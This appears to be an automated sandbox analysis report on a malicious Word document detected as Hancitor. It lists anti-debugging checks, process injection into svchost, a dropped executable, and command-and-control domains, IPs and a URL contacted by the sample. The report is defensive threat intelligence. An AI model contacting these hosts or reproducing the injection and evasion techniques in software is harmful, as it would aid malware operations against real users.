Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F863E04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F863E04
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_6F833580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_6F833580
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8624FB mov eax, dword ptr fs:[00000030h] 3_2_6F8624FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A13E3 mov eax, dword ptr fs:[00000030h] 3_2_6F8A13E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A1319 mov eax, dword ptr fs:[00000030h] 3_2_6F8A1319
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A0F21 push dword ptr fs:[00000030h] 3_2_6F8A0F21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8624FB mov eax, dword ptr fs:[00000030h] 3_2_6F8624FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A13E3 mov eax, dword ptr fs:[00000030h] 3_2_6F8A13E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A1319 mov eax, dword ptr fs:[00000030h] 3_2_6F8A1319
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A0F21 push dword ptr fs:[00000030h] 3_2_6F8A0F21
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F831390 GetProcessHeap,RtlAllocateHeap, 3_2_6F831390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F831390 GetProcessHeap,RtlAllocateHeap, 3_2_6F831390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F863E04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F863E04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F86032C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6F86032C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F86012C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F86012C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F863E04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F863E04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F86032C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6F86032C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F86012C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F86012C

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.82.218.163 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 8.208.13.158 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 54.235.142.93 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.82.218.163 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 8.208.13.158 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 54.235.142.93 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 600000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 600000 protect: page execute and read and write Jump to behavior
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 3_2_6F833880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 3_2_6F833880
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: 1118_8732615.doc, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe Jump to behavior
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F85FBA4 cpuid 3_2_6F85FBA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F85FBA4 cpuid 3_2_6F85FBA4
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F85FD74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_6F85FD74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F85FD74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_6F85FD74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F831AA0 GetVersion,wsprintfA,Sleep,wsprintfA, 3_2_6F831AA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F831AA0 GetVersion,wsprintfA,Sleep,wsprintfA, 3_2_6F831AA0

Remote Access Functionality:

barindex
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6848, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 319766 Sample: 1118_8732615.doc Startdate: 18/11/2020 Architecture: WINDOWS Score: 100 27 Malicious sample detected (through community Yara rule) 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 Document exploit detected (drops PE files) 2->31 33 10 other signatures 2->33 7 WINWORD.EXE 35 65 2->7         started        process3 file4 19 C:\Users\user\AppData\Local\Temp\22.mp4, PE32 7->19 dropped 35 Document exploit detected (process start blacklist hit) 7->35 11 rundll32.exe 12 7->11         started        15 splwow64.exe 7->15         started        signatures5 process6 dnsIp7 21 duarreecto.ru 185.82.218.163, 49733, 49752, 80 ITL-BG Bulgaria 11->21 23 sturtevantforcongress.com 8.208.13.158, 49740, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 11->23 25 3 other IPs or domains 11->25 37 System process connects to network (likely due to code injection or exploit) 11->37 39 Contains functionality to inject threads in other processes 11->39 41 Allocates memory in foreign processes 11->41 17 svchost.exe 11->17         started        signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
8.208.13.158
 unknown Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
54.235.142.93
 unknown United States
14618 AMAZON-AESUS false
185.82.218.163
 unknown Bulgaria
59729 ITL-BG true

Contacted Domains

Name IP Active
sturtevantforcongress.com 8.208.13.158 true
elb097307-934924932.us-east-1.elb.amazonaws.com 54.235.142.93 true
duarreecto.ru 185.82.218.163 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api.ipify.org/ false
    		high
    http://duarreecto.ru/8/forum.php true
    • Avira URL Cloud: safe
    		 unknown